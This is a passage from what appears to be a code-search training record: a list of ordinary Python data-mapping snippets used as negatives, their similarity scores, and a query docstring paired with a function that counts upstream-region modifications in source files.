record.get(\"composer_tesim\")\n record[\"illustrator_sim\"] = record.get(\"illustrator_tesim\")\n record[\"editor_sim\"] = record.get(\"editor_tesim\")\n record[\"calligrapher_sim\"] = record.get(\"calligrapher_tesim\")\n record[\"engraver_sim\"] = record.get(\"engraver_tesim\")\n record[\"printmaker_sim\"] = record.get(\"printmaker_tesim\")\n record[\"human_readable_language_sim\"] = record.get(\"human_readable_language_tesim\")\n record[\"names_sim\"] = name_fields(record)\n record[\"keywords_sim\"] = keywords_fields(record)\n record[\"collection_sim\"] = record.get(\"collection_ssi\")\n # explicit\n record[\"features_sim\"] = record.get(\"features_tesim\")\n # incipit\n # inscription\n record[\"script_sim\"] = record.get(\"script_tesim\")\n record[\"writing_system_sim\"] = record.get(\"writing_system_tesim\")\n record[\"year_isim\"] = year_parser.integer_years(record.get(\"normalized_date_tesim\"))\n record[\"date_dtsim\"] = solr_transformed_dates(solr_client,\n (date_parser.get_dates(record.get(\"normalized_date_tesim\"))))\n record[\"place_of_origin_sim\"] = record.get(\"place_of_origin_tesim\")\n record[\"associated_name_sim\"] = record.get(\"associated_name_tesim\")\n record[\"form_sim\"] = record.get(\"form_tesim\")\n record[\"support_sim\"] = record.get(\"support_tesim\")\n record[\"genre_sim\"] = record.get(\"genre_tesim\")\n record[\"subject_sim\"] = record.get(\"subject_tesim\")\n record[\"location_sim\"] = record.get(\"location_tesim\")\n record[\"named_subject_sim\"] = record.get(\"named_subject_tesim\")\n 
record[\"human_readable_resource_type_sim\"] = record.get(\"resource_type_tesim\")\n record[\"member_of_collections_ssim\"] = record.get(\"dlcs_collection_name_tesim\")\n\n # SINAI INDEX\n record[\"header_index_tesim\"] = header_fields(record)\n record[\"name_fields_index_tesim\"] = name_fields_index(record)\n\n # SORT FIELDS\n titles = record.get(\"title_tesim\")\n if isinstance(titles, typing.Sequence) and len(titles) >= 1:\n record[\"sort_title_ssort\"] = titles[0]\n\n # used a solr copyfield for shelfmark sorting\n # shelfmarks = record.get(\"shelfmark_ssi\")\n # print(shelfmarks)\n # if isinstance(shelfmarks, typing.Sequence) and len(shelfmarks) >= 1:\n # print(shelfmarks[0])\n # record[\"shelfmark_aplha_numeric_ssort\"] = shelfmarks[0]\n\n# -----------------------------------------------------------------------\n years = record.get(\"year_isim\")\n if isinstance(years, typing.Sequence) and len(years) >= 1:\n record[\"sort_year_isi\"] = min(years)\n\n dates = record.get(\"date_dtsim\")\n if isinstance(dates, typing.Sequence) and len(dates) >= 1:\n record[\"date_dtsort\"] = dates[0]\n return record", "def mapRow(row):\n commentsRow = row.comments\n captionRow = row.caption\n comments = commentsRow.data # select comments\n textComments = \" \".join([x.text for x in comments]) # remove metadata from comments\n if hasattr(captionRow, \"edges\"):\n captions = captionRow.edges\n textCaptions = \" \".join([x.node.text for x in captions])\n if hasattr(captionRow, \"text\"):\n textCaptions = captionRow.text\n if not row.tags is None:\n tags = \" \".join([x for x in row.tags])\n else:\n tags = \"\"\n textComments = textComments.replace(\"\\n\", \" \")\n textComments = textComments.replace(\"\\t\", \" \")\n textComments = textComments.replace(\",\", \" \")\n textCaptions = textCaptions.replace(\"\\n\", \" \")\n textCaptions = textCaptions.replace(\"\\t\", \" \")\n textCaptions = textCaptions.replace(\",\", \" \")\n tags = tags.replace(\"\\n\", \" \")\n tags = tags.replace(\"\\t\", \" \")\n tags = tags.replace(\",\", \" \")\n if len(row.urls) > 0:\n url = row.urls[0]\n else:\n url = \"missing-url\"\n id = row.id\n return pyspark.sql.Row(comments=textComments, caption=textCaptions, tags=tags, id=id, url=url)", "def apply(self, data):\n print(\"this is morphism '{}'\".format(self.name))\n data = np.array(data)\n transformed_data = self.transf(data)\n return pd.DataFrame.from_dict({\"transf\": transformed_data.flatten()})", "def _map_fn(self):\n raise NotImplementedError", "def populate_instance(self, mapper, selectcontext, row, instance, **flags):\n instance.TEST = \"hello world\"\n return EXT_CONTINUE", "def _get_map_record(self):\n return self.mapper.map_record(self.binding_record)", "def mapping(self, mapping):\n self.set_mapping(mapping)", "def run_mapper():\n print(blue + \"\\n>>> \" + reset + \"Executing the model mapper...\")\n\n cmdb_ci_types = cmdb_data_model.cmdb_data_model.get(\"ci_types\")\n cmdb_rel_types = cmdb_data_model.cmdb_data_model.get(\"rel_types\")\n cmdb_ci_attributes = cmdb_data_model.cmdb_data_model.get(\"ci_attributes\")\n cmdb_rel_attributes = cmdb_data_model.cmdb_data_model.get(\"rel_attributes\")\n\n db_ci_types = db_data_model.db_data_model.get(\"ci_types\")\n db_rel_types = db_data_model.db_data_model.get(\"rel_types\")\n db_ci_attributes = db_data_model.db_data_model.get(\"ci_attributes\")\n db_rel_attributes = db_data_model.db_data_model.get(\"rel_attributes\")\n\n print(blue + \"\\n>>> \" + reset +\n \"Calculating configuration item types similarity...\")\n 
ci_similarity = calculate_class_similarity(cmdb_ci_types, db_ci_types)\n\n new_ci_similarity = {}\n for key in ci_similarity:\n new_ci_similarity[key] = {k: v for k, v in sorted(\n ci_similarity.get(key).items(), key=lambda item: item[1], reverse=True)}\n order = {}\n for key in new_ci_similarity:\n if len(new_ci_similarity.get(key)) > 0:\n order[key] = new_ci_similarity.get(key).get(\n list(new_ci_similarity.get(key).keys())[0])\n order = {k: v for k, v in sorted(\n order.items(), key=lambda item: item[1], reverse=True)}\n ci_similarity = {}\n for key in order:\n ci_similarity[key] = new_ci_similarity.get(key)\n\n similar_ci = select_most_similar(ci_similarity, {}, [])\n new_similar_ci = {}\n for key in similar_ci:\n if len(similar_ci.get(key)) > 0:\n new_similar_ci[key] = similar_ci.get(key)\n similar_ci = new_similar_ci\n\n print(blue + \"\\n>>> \" + reset + \"Calculating relationship types similarity...\")\n rel_similarity = calculate_class_similarity(cmdb_rel_types, db_rel_types)\n\n new_rel_similarity = {}\n for key in rel_similarity:\n new_rel_similarity[key] = {k: v for k, v in sorted(\n rel_similarity.get(key).items(), key=lambda item: item[1], reverse=True)}\n order = {}\n for key in new_rel_similarity:\n if len(new_rel_similarity.get(key)) > 0:\n order[key] = new_rel_similarity.get(key).get(\n list(new_rel_similarity.get(key).keys())[0])\n order = {k: v for k, v in sorted(\n order.items(), key=lambda item: item[1], reverse=True)}\n rel_similarity = {}\n for key in order:\n rel_similarity[key] = new_rel_similarity.get(key)\n\n similar_rel = select_most_similar(rel_similarity, {}, [])\n new_similar_rel = {}\n for key in similar_rel:\n if len(similar_rel.get(key)) > 0:\n new_similar_rel[key] = similar_rel.get(key)\n similar_rel = new_similar_rel\n\n print(blue + \"\\n>>> \" + reset +\n \"Calculating configuration item attributes similarity...\")\n attr_ci_similarity = calculate_attribute_similarity(\n similar_ci, cmdb_ci_attributes, db_ci_attributes)\n\n new_attr_ci_similarity = {}\n for cmdb_t in attr_ci_similarity:\n new_attr_ci_similarity[cmdb_t] = {}\n for key in attr_ci_similarity.get(cmdb_t):\n new_attr_ci_similarity[cmdb_t][key] = {k: v for k, v in sorted(\n attr_ci_similarity.get(cmdb_t).get(key).items(), key=lambda item: item[1], reverse=True)}\n\n order = {}\n for cmdb_t in new_attr_ci_similarity:\n order[cmdb_t] = {}\n for key in new_attr_ci_similarity.get(cmdb_t):\n if len(new_attr_ci_similarity.get(cmdb_t).get(key)) > 0:\n order[cmdb_t][key] = new_attr_ci_similarity.get(cmdb_t).get(key).get(\n list(new_attr_ci_similarity.get(cmdb_t).get(key).keys())[0])\n for o in order:\n order[o] = {k: v for k, v in sorted(\n order.get(o).items(), key=lambda item: item[1], reverse=True)}\n\n attr_ci_similarity = {}\n for o in order:\n attr_ci_similarity[o] = {}\n for key in order.get(o):\n attr_ci_similarity[o][key] = new_attr_ci_similarity.get(o).get(key)\n\n similar_attr_ci = {x: select_most_similar(\n attr_ci_similarity.get(x), {}, []) for x in attr_ci_similarity}\n\n new_similar_attr_ci = {}\n for key in similar_attr_ci:\n if len(similar_attr_ci.get(key)) > 0:\n new_similar_attr_ci[key] = similar_attr_ci.get(key)\n similar_attr_ci = new_similar_attr_ci\n\n print(blue + \"\\n>>> \" + reset +\n \"Calculating relationship attributes similarity...\")\n attr_rel_similarity = calculate_attribute_similarity(\n similar_rel, cmdb_rel_attributes, db_rel_attributes)\n\n new_attr_rel_similarity = {}\n for cmdb_t in attr_rel_similarity:\n new_attr_rel_similarity[cmdb_t] = {}\n for key in 
attr_rel_similarity.get(cmdb_t):\n new_attr_rel_similarity[cmdb_t][key] = {k: v for k, v in sorted(\n attr_rel_similarity.get(cmdb_t).get(key).items(), key=lambda item: item[1], reverse=True)}\n\n order = {}\n for cmdb_t in new_attr_rel_similarity:\n order[cmdb_t] = {}\n for key in new_attr_rel_similarity.get(cmdb_t):\n if len(new_attr_rel_similarity.get(cmdb_t).get(key)) > 0:\n order[cmdb_t][key] = new_attr_rel_similarity.get(cmdb_t).get(key).get(\n list(new_attr_rel_similarity.get(cmdb_t).get(key).keys())[0])\n for o in order:\n order[o] = {k: v for k, v in sorted(\n order.get(o).items(), key=lambda item: item[1], reverse=True)}\n\n attr_rel_similarity = {}\n for o in order:\n attr_rel_similarity[o] = {}\n for key in order.get(o):\n attr_rel_similarity[o][key] = new_attr_rel_similarity.get(\n o).get(key)\n\n similar_attr_rel = {x: select_most_similar(\n attr_rel_similarity.get(x), {}, []) for x in attr_rel_similarity}\n\n new_similar_attr_rel = {}\n for key in similar_attr_rel:\n if len(similar_attr_rel.get(key)) > 0:\n new_similar_attr_rel[key] = similar_attr_rel.get(key)\n similar_attr_rel = new_similar_attr_rel\n\n present_map(cmdb_ci_types, db_ci_types, cmdb_rel_types, db_rel_types, cmdb_ci_attributes, db_ci_attributes, cmdb_rel_attributes, db_rel_attributes, similar_ci, similar_rel,\n similar_attr_ci, similar_attr_rel)\n\n threshold = ask_for_threshold()\n\n define_rules(float(threshold), similar_ci, similar_rel,\n similar_attr_ci, similar_attr_rel)", "def cell_map_from_database(self) -> None:\n for row in self.session.query(DatamapItem).all():\n self.cell_map.append(\n Cell(\n datamap_id=row.id,\n cell_key=row.key,\n cell_value=None,\n template_sheet=row.bicc_sheet,\n bg_colour=None,\n fg_colour=None,\n number_format=None,\n verification_list=None,\n cell_reference=row.bicc_cellref))", "def update_row(self, pk, row_dict):\n return self.execute(self.commands.update_row(\n self.name,\n col_val=self._join_equality(row_dict),\n pk_col=self.primary_key_column,\n pk=pk\n ))", "def iter_rows(self, *args):\n\n raw_args = []\n for arg in args:\n if arg in self._column_translations:\n raw_args+=self._column_translations[arg].inputs()\n else:\n raw_args.append(arg)\n for raw_values in self.iter_rows_raw(*raw_args):\n values = [raw_values[0], raw_values[1]]\n for arg in args:\n if arg in self._column_translations:\n values.append(self._column_translations[arg](raw_args, raw_values[2:]))\n else:\n values.append(raw_values[2:][raw_args.index(arg)])\n yield values", "def map(self, function):\n return FunctionalWrapper(map(function, self.data))", "def to_dask_input_data(self, *data: List[Row]) -> Dict[str, List[Any]]:\n\n if not len(data) == len(self.input_keys):\n logger.warning(\n \"%s expected %s input keys, received %s\",\n self,\n len(self.input_keys),\n len(data),\n )\n\n output: Dict[str, List[Any]] = {}\n for i, rowset in enumerate(data):\n collection_address = self.input_keys[i]\n field_mappings = self.incoming_field_map[collection_address]\n\n for row in rowset:\n for foreign_field, local_field in field_mappings:\n append(output, local_field, row.get(foreign_field))\n\n return output", "def _map_raw_data_to_standard(self):\n data_df = self._raw_data.copy()\n\n # if only 1 RT col, split into 2\n if self._map_cols['goRT'] == self._map_cols['stopRT']:\n data_df[self._standards['columns']['goRT']] = np.where(\n data_df[self._map_cols['condition']] == self._map_codes['go'],\n data_df[self._map_cols['goRT']],\n None)\n data_df[self._standards['columns']['stopRT']] = np.where(\n 
data_df[self._map_cols['condition']] ==\n self._map_codes['stop'],\n data_df[self._map_cols['stopRT']],\n None)\n del data_df[self._map_cols['goRT']]\n else:\n data_df.loc[\n data_df[self._map_cols['condition']] !=\n self._map_codes['go'],\n self._map_cols['goRT']] = None\n data_df.loc[\n data_df[self._map_cols['condition']] !=\n self._map_codes['stop'],\n self._map_cols['stopRT']] = None\n\n # drop SSDs of non-stop Trials\n data_df.loc[\n data_df[self._map_cols['condition']] != self._map_codes['stop'],\n self._map_cols['SSD']] = None\n\n # add block column if not present\n if self._map_cols['block'] not in data_df.columns:\n data_df[self._map_cols['block']] = 1\n\n # recompute choice accuracy if missing / flagged\n if (self._map_cols['choice_accuracy'] not in self._raw_data.columns) |\\\n self._compute_acc_col:\n corr_code = self._map_codes['correct']\n incorr_code = self._map_codes['incorrect']\n data_df[self._map_cols['choice_accuracy']] = np.where(\n data_df[self._map_cols['response']] == data_df[\n self._map_cols['correct_response']],\n corr_code,\n incorr_code)\n\n # map columns, key codes to standard\n rename_column_dict = {self._map_cols[col]: self._standards['columns']\n [col] for col in self._map_cols.keys()}\n data_df = data_df.rename(columns=rename_column_dict)\n\n # map key codes to various columns\n condition_map = {\n self._map_codes['go']: self._standards['key_codes']['go'],\n self._map_codes['stop']: self._standards['key_codes']['stop'],\n }\n acc_map = {\n self._map_codes['correct']: self._standards['key_codes']['correct'],\n self._map_codes['incorrect']: self._standards['key_codes']['incorrect'],\n }\n no_response_map = {\n self._map_codes['noResponse']: self._standards['key_codes']['noResponse']\n }\n cols_n_maps = [(self._standards['columns']['condition'], condition_map),\n (self._standards['columns']['choice_accuracy'], acc_map),\n (self._standards['columns']['goRT'], no_response_map),\n (self._standards['columns']['stopRT'], no_response_map)]\n for col, map_dict in cols_n_maps:\n data_df[col] = data_df[col].map(lambda x: map_dict.get(x,x))\n\n assert self._is_preprocessed(data_df)\n self._transformed_data = data_df", "def update_row(self, rowIndex=0, shape=None, *args, **attributes):\n # check if there is a shape edit, if not skip and do attribute update\n if shape:\n if not isinstance(shape, shapefile.shapefile._Shape):\n self.shapes[rowIndex].points = shape\n else:\n self.shapes[rowIndex] = shape\n\n if attributes:\n for f_name, f_value in attributes.iteritems():\n f_index = self.field_indices[f_name]\n if f_index >= len(self.records[rowIndex]):\n self.records[rowIndex].append(f_value)\n else:\n self.records[rowIndex][f_index] = f_value\n\n self.__isBuilt = False", "def _map_input(self, data: Dict,\n mapping: Optional[Dict]) -> Dict[str, Any]:\n\n if mapping is None:\n return data.copy()\n\n def _map(data, m):\n if isinstance(m, dict):\n # m is a dict {inner_key:outer_key, ...}\n return {k_in: _map(data, k_out) for k_in, k_out in m.items()}\n if isinstance(m, (tuple, list)):\n # m is a list or tuple [outer_key1, outer_key2, ...]\n # This is the case when we collect items from the original\n # data to form a list or tuple to feed to the wrapped\n # transforms.\n return m.__class__(_map(data, e) for e in m)\n\n # allow manually mark a key to be ignored by ...\n if m is ...:\n return IgnoreKey\n\n # m is an outer_key\n if self.allow_nonexist_keys:\n return data.get(m, IgnoreKey)\n else:\n return data.get(m)\n\n collected = _map(data, mapping)\n\n # Retain unmapped 
items\n inputs = data.copy()\n inputs.update(collected)\n\n return inputs", "def from_mapping(cls, mapping, **kwargs):\n row = mapping['row'].values\n col = mapping['col'].values\n n_rows = mapping.metadata['n_rows']\n n_cols = mapping.metadata['n_columns']\n image = cls(row, col, n_rows, n_cols, **kwargs)\n image._mapping = mapping\n return image", "def _get_mapper_0(model):\n # build the maps\n eids_all = (\n list(model.elements.keys()) +\n list(model.masses.keys()) +\n list(model.rigid_elements.keys())\n )\n eid_map = {eid : eid for eid in eids_all}\n nid_map = {nid : nid for nid in model.point_ids}\n cid_map = {cid : cid for cid in model.coord_ids}\n mid_map = {mid : mid for mid in model.material_ids}\n spc_map = _dicts_key_to_key((model.spcs, model.spcadds))\n mpc_map = _dicts_key_to_key((model.mpcs, model.mpcadds))\n method_map = _dict_key_to_key(model.methods)\n properties_map = _dict_key_to_key(model.properties)\n rigid_elements_map = _dict_key_to_key(model.rigid_elements)\n cmethod_map = _dict_key_to_key(model.cMethods)\n flfact_map = _dict_key_to_key(model.flfacts)\n flutter_map = _dict_key_to_key(model.flutters)\n caero_map = _dict_key_to_key(model.caeros)\n freq_map = _dict_key_to_key(model.frequencies)\n\n dload_map = _dicts_key_to_key((model.dload_entries, model.dloads))\n load_map = _dicts_key_to_key((model.loads, model.load_combinations))\n lseq_map = load_map # wrong???\n temp_map = load_map # wrong???\n\n tstep_map = _dict_key_to_key(model.tsteps)\n tstepnl_map = _dict_key_to_key(model.tstepnls)\n suport1_map = _dict_key_to_key(model.suport1)\n #suport_map = {}\n\n nlparm_map = _dict_key_to_key(model.nlparms)\n #nlpci_map = _dict_key_to_key(model.nlpcis)\n table_sdamping_map = _dict_key_to_key(model.tables_sdamping)\n dconadd_map = _dict_key_to_key(model.dconadds)\n dconstr_map = _dict_key_to_key(model.dconstrs)\n dessub_map = dconadd_map\n for key, value in dconstr_map.items():\n if key in dessub_map:\n raise NotImplementedError()\n dessub_map[key] = value\n dresp_map = _dict_key_to_key(model.dresps)\n gust_map = _dict_key_to_key(model.gusts)\n trim_map = _dict_key_to_key(model.trims)\n tic_map = _dict_key_to_key(model.tics)\n csschd_map = _dict_key_to_key(model.csschds)\n tranfer_function_map = _dict_key_to_key(model.transfer_functions)\n\n mapper = {\n 'elements' : eid_map,\n 'nodes' : nid_map,\n 'coords' : cid_map,\n 'materials' : mid_map,\n 'properties' : properties_map,\n 'rigid_elements': rigid_elements_map,\n 'spcs' : spc_map,\n 'mpcs' : mpc_map,\n 'METHOD' : method_map,\n 'CMETHOD' : cmethod_map,\n 'FLFACT' : flfact_map,\n 'FMETHOD' : flutter_map,\n 'caeros' : caero_map,\n 'FREQUENCY' : freq_map,\n\n 'DLOAD' : dload_map,\n 'LOAD' : load_map,\n 'LOADSET' : lseq_map,\n 'TSTEP' : tstep_map,\n 'TSTEPNL' : tstepnl_map,\n 'SUPORT1' : suport1_map,\n 'NLPARM' : nlparm_map,\n 'SDAMPING' : table_sdamping_map,\n 'DESSUB' : dessub_map,\n 'DESOBJ' : dresp_map,\n 'GUST' : gust_map,\n 'TRIM' : trim_map,\n 'IC' : tic_map,\n 'CSSCHD' : csschd_map,\n 'TFL' : tranfer_function_map,\n #'DESSUB' : dessub_map,\n # bad...\n 'TEMPERATURE(LOAD)' : temp_map,\n 'TEMPERATURE(INITIAL)' : temp_map,\n #'DATAREC' : datarec_map,\n #'ADAPT' : adapt_map,\n #'SUPER' : super_map,\n #'BOUTPUT' : boutput_map,\n #'OUTRCV' : outrcv_map,\n }\n\n return mapper", "def _predicts(self, Xrow):\n _, row = Xrow\n return self._predicts_target_values(row, None)", "def _predicts(self, Xrow):\n _, row = Xrow\n return self._predicts_target_values(row, None)", "def _predicts(self, Xrow):\n _, row = Xrow\n return 
self._predicts_target_values(row, None)", "def _predicts(self, Xrow):\n _, row = Xrow\n return self._predicts_target_values(row, None)" ]
[ "0.66845304", "0.62534523", "0.61838084", "0.604524", "0.59644157", "0.5678246", "0.56550837", "0.5597702", "0.5595955", "0.5552257", "0.55398905", "0.54507", "0.54413307", "0.542242", "0.54172045", "0.54105145", "0.5367758", "0.5321824", "0.5305091", "0.5284699", "0.52551997", "0.52550423", "0.52549005", "0.5245833", "0.52254117", "0.5220396", "0.52153003", "0.52046514", "0.5201628", "0.51888216", "0.5177829", "0.5169637", "0.5161584", "0.51350164", "0.5133342", "0.5107604", "0.5106464", "0.5101935", "0.51015544", "0.5098933", "0.50942475", "0.5093606", "0.5087804", "0.50874376", "0.50823057", "0.5081323", "0.50783694", "0.50681627", "0.5063306", "0.505947", "0.50591224", "0.5044728", "0.5024446", "0.5020481", "0.5017457", "0.5010907", "0.5005777", "0.49898392", "0.49883914", "0.498732", "0.49869066", "0.49835944", "0.49815464", "0.49811786", "0.4972871", "0.49710566", "0.49704906", "0.49655855", "0.4963671", "0.49616045", "0.49551028", "0.49529052", "0.4952207", "0.49496162", "0.49479532", "0.49434775", "0.4932023", "0.49205577", "0.49172145", "0.49134913", "0.4912351", "0.49090734", "0.48613766", "0.4859486", "0.4859393", "0.48592788", "0.4851829", "0.48418313", "0.48412114", "0.4840923", "0.48407304", "0.48318064", "0.4831047", "0.48262933", "0.48260072", "0.48240268", "0.4821462", "0.4821462", "0.4821462", "0.4821462" ]
0.77035165
0
Updates stats inside mod_stats_map with data gathered from the file.
def get_file_mod_stats_for_upstream_refs(file_name, mod_stats_map): with open(file_name) as f: lines = f.readlines() upstream_ref = None upstream_start_line = None for line_number, line in enumerate(lines): if REGION_START_TAG in line: tag, ref_name = _extract_tag_and_ref_name_from_line(line, False) if REGION_UPSTREAM_TAG in tag: upstream_ref = ref_name upstream_start_line = line_number elif REGION_END_TAG in line and upstream_ref: mod_stats = mod_stats_map[upstream_ref] mod_stats.mod_count += 1 mod_stats.line_count += line_number - upstream_start_line - 1 upstream_ref = None upstream_start_line = None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_stat_file(self):\n logfile = \"../data/{}_stat.json\".format(self.ID)\n statobj = {\n 'hp': self.hp,\n 'max_hp': MAX_TANK_HP,\n 'ammo': self.ammo,\n 'score': self.score,\n 'age': self.age,\n 'alive': not self.is_dead(),\n 'color': TANK_COLORS[self.color],\n }\n if USE_SIMULATOR:\n js.globals.handle_stat(self.ID, json.dumps(statobj))\n else:\n with open(logfile, 'w') as f:\n f.write(json.dumps(statobj))", "def _file_update(self, filename):\n values = TaskInfo._parse_file(filename)\n self._load_dict(values)", "def update_stats(self):\n modEnum = Mod_Enum()\n self.attack = self.baseAttack + self.get_stat(modEnum.MOD_ATTACK)\n self.defense = self.baseDefense + self.get_stat(modEnum.MOD_DEFENSE)\n self.hp[1] = 100 * ( 1 + self.get_stat(modEnum.MOD_HP) )\n self.absorbtion = self.get_stat(modEnum.MOD_ABSORB)\n self.regen = 0.00 + self.get_stat(modEnum.MOD_REGEN)\n self.lifeLeech = 0.00 + self.get_stat(modEnum.MOD_LEECH)\n self.crit = 0.00 + self.get_stat(modEnum.MOD_CRIT)\n self.attackSpeedMultiplier = 1.0 + self.get_stat(modEnum.MOD_ATTACK_SPEED)\n self.moveSpeedMultiplier = 1.0 + self.get_stat(modEnum.MOD_MOVE_SPEED)\n #cap move speed\n if self.moveSpeedMultiplier > 4.0:\n self.moveSpeedMultiplier = 4.0 + 0.25 * (self.moveSpeedMultiplier - 4.0)\n \n self.speed = self.baseSpeed * self.moveSpeedMultiplier", "def readPlayerFileAndFillStats(players_data_filename, game_stats):\n\tplayer_stats = {}\n\tteam_stats = {}\n\tgame_stats_clean = {}\n\tgame_stats = fillGameStats(players_data_filename, game_stats)\n\n\twith open(players_data_filename) as csvfile:\n\t reader = csv.DictReader(csvfile)\n\t for row in reader:\n\t \tgame_id = row['game_id']\n\n\t \tif isGameStatsValid(game_stats[game_id]):\n\t\t \tplayer_id = row['player_id']\n\t\t \tteam_id = row['team_id']\n\t\t \tkills = row['kill']\n\t\t \tdeaths = row['death']\n\t\t \tassists = row['assists']\n\t\t \tgold = row['gold_earned']\n\n\t\t \tif not game_stats.get(game_id):\n\t\t \t\tprint('no game id')\n\n\t\t \tkills = int(kills)\n\t\t \tdeaths = int(deaths)\n\t\t \tassists = int(assists)\n\t\t \tgold = int(gold)\n\n\t\t \tif not game_stats_clean.get(game_id):\n\t \t\t\tgame_stats_clean[game_id] = game_stats[game_id]\n\n\t\t \twin = 0\n\t\t \tif game_stats[game_id]['winner_team_id'] == team_id:\n\t\t \t\twin = 1\n\t\t \t\n\n\t\t \tif not team_stats.get(team_id):\n\t \t\t\tteam_stats[team_id] = {'games_played': 1, 'wins': 0, 'loses': 0, 'kills': 0, 'deaths': 0, 'assists': 0, 'gold': 0, 'player_ids': Set([]), 'game_ids': Set([]), 'player_stats': []}\n\t \t\t\n\t \t\tteam_stats[team_id]['wins'] += win/5\n\t \t\tteam_stats[team_id]['loses'] += (1 - win)/5\n\t\t \tteam_stats[team_id]['kills'] += kills\n\t\t \tteam_stats[team_id]['deaths'] += deaths\n\t\t \tteam_stats[team_id]['assists'] += assists\n\t\t \tteam_stats[team_id]['gold'] += gold\n\t\t \tteam_stats[team_id]['player_ids'].add(player_id)\n\t\t \tteam_stats[team_id]['game_ids'].add(game_id)\n\t\t \tteam_stats[team_id]['games_played'] = len(team_stats[team_id]['game_ids'])\n\n\n\t\t \tif not player_stats.get(player_id):\n\t\t \t\tplayer_stats[player_id] = {'games_played': 1, 'wins': win, 'loses': 1 - win, 'kills': kills, 'deaths': deaths, 'assists': assists, 'gold': gold, 'team_ids': Set([team_id])}\n\t\t \telse:\n\t\t \t\tplayer_stats[player_id]['games_played'] += 1\n\t\t \t\tplayer_stats[player_id]['wins'] += win\n\t\t \t\tplayer_stats[player_id]['loses'] += 1 - win\n\t\t \t\tplayer_stats[player_id]['kills'] += kills\n\t\t \t\tplayer_stats[player_id]['deaths'] += deaths\n\t\t 
\t\tplayer_stats[player_id]['assists'] += assists\n\t\t \t\tplayer_stats[player_id]['gold'] += gold\n\t\t \t\tplayer_stats[player_id]['team_ids'].add(team_id)\n\n\t\t \t#team_stats[team_id]['player_stats'].append({player_id: player_stats[player_id]})\n\n\treturn game_stats_clean, team_stats, player_stats", "def update_stats():\r\n\turl = \"https://www.pathofexile.com/\" + \"api/trade/data/stats\"\r\n\tsave_path = \"data/stats.json\"\r\n\tr = requests.get(url)\r\n\twith open(save_path, \"w\") as fileID:\r\n\t\tfileID.write(r.text)", "def UpdateFile(self, modID = None):\n if modID is None:\n modID = self.modActive\n\n source = self.modules[modID][1]\n filename = self.modules[modID][2]\n\n try:\n file = open(filename, \"wt\")\n file.write(source)\n finally:\n file.close()", "def updateFileData(self):\n with open(pagePath(self.pageName)) as f:\n self.fileData = f.read()\n self.lastUpdated = time.time()", "def __collect_stats(self, encode, file_name):\n if encode not in self.__hash.keys():\n self.__hash[encode] = []\n self.__hash[encode].append(file_name)\n self.__files_count += 1\n with open(file_name, 'r', encoding=encode) as fr:\n for line in fr:\n self.__lines += 1\n self.__chars += len(line)", "def update_status(self):\n\n # Memory information can be found in status and statm /proc/PID files\n # status file VmRSS equivalent to top's RES column\n # statm disagrees with status VmRSS, I think it may not include\n # sub-processes\n # From: man proc\n # * VmPeak: Peak virtual memory size.\n # * VmSize: Virtual memory size.\n # * VmHWM: Peak resident set size (\"high water mark\").\n # * VmRSS: Resident set size.\n\n # status_fields should be ordered as in the status file\n fields = iter(self.status_fields)\n field = next(fields)\n with open(self.status_path) as f:\n for line in f:\n if line.startswith(field):\n # separated by white-space, 2nd element is value\n # 3rd is units e.g. 
kB\n # At the moment all fields are ints\n self.status[field] = int(line.split()[1])\n\n try:\n field = next(fields)\n except StopIteration:\n # Just found the last field in status_fields\n break", "def update(self):\n try:\n with open(self._file_path, encoding=\"utf-8\") as file_data:\n for line in file_data:\n data = line\n data = data.strip()\n except (IndexError, FileNotFoundError, IsADirectoryError, UnboundLocalError):\n _LOGGER.warning(\n \"File or data not present at the moment: %s\",\n os.path.basename(self._file_path),\n )\n return\n\n if self._val_tpl is not None:\n self._state = self._val_tpl.async_render_with_possible_json_value(\n data, None\n )\n else:\n self._state = data", "def loadMetaChunkToServerMap (fileName):\n if not os.path.exists(fileName):\n print \"File \", fileName, \" does not exists\"\n sys.exit(1)\n\n infile = open (fileName, \"r\")\n count = 0\n while infile:\n count = count + 1\n line = infile.readline()\n if not line:\n break\n print \"DEBUGME : processing line %s, %d\" % (line, count)\n lineParts = line.split(' ')\n gChunkMap[lineParts[0]] = ChunkInfo(lineParts[0], lineParts[1], lineParts[2])\n # Add a ChunkHostInfo\n numServers = int(lineParts[2])\n for i in range(numServers):\n i = i * 3\n gChunkMap[lineParts[0]].addChunkHostInfo(ChunkHostInfo(lineParts[i+3], lineParts[i+4], lineParts[i+5]))", "def update_stats():\n list_db = get_list_database()\n\n list_db.group_stats_force_update()\n transaction_commit(None, 'GroupStatsUpdate')\n\n list_db.user_stats_force_update()\n transaction_commit(None, 'UserStatsUpdate')", "def map(item):\n user_services.update_dashboard_stats_log(item.id)", "def _update_base_stats(self, base_stats):\n self.total_samples += base_stats[\"sample_size\"]\n self.sample = base_stats[\"sample\"]\n self._empty_line_count += base_stats[\"empty_line_count\"]\n self.memory_size += base_stats[\"memory_size\"]", "def stats(self, file, **options):\n\n options['file'] = file\n\n return self._get('stats', **options)", "def load_stats():\n assert isinstance(settings.PARS['numBases'], int)\n assert isinstance(settings.PARS['dataset'], str)\n\n stat_filename = 'stat_{}_{}.json'.format(\n settings.PARS['numBases'], settings.PARS['dataset'])\n stat_full_path = os.path.join(settings.GENERATED_DATA_DIRECTORY, stat_filename)\n\n with open(stat_full_path, 'r') as file_:\n fobj_avg = json.load(file_)\n\n fobj_avg = {int(k): v for k, v in fobj_avg.items()}\n\n return fobj_avg", "def update_statistics(status):\n if not os.path.isfile(CONFIG['stats_file']):\n current_stats = {}\n else:\n current_stats = json.loads(open(CONFIG['stats_file'], 'r').read())\n # current_stats = delete_old_statistics(current_stats)\n\n current_key = int(datetime.datetime.now().strftime('%Y%m%d%H%M'))\n for host, state in ((h['host'], h['status']) for h in status):\n if host not in current_stats:\n current_stats[host] = {}\n\n # get newest entry of host\n newest_state = None, None\n for key, entry in current_stats[host].items():\n if newest_state[0] is None or int(key) > int(newest_state[0]):\n newest_state = key, entry\n if newest_state[1] != state:\n # state has changed. 
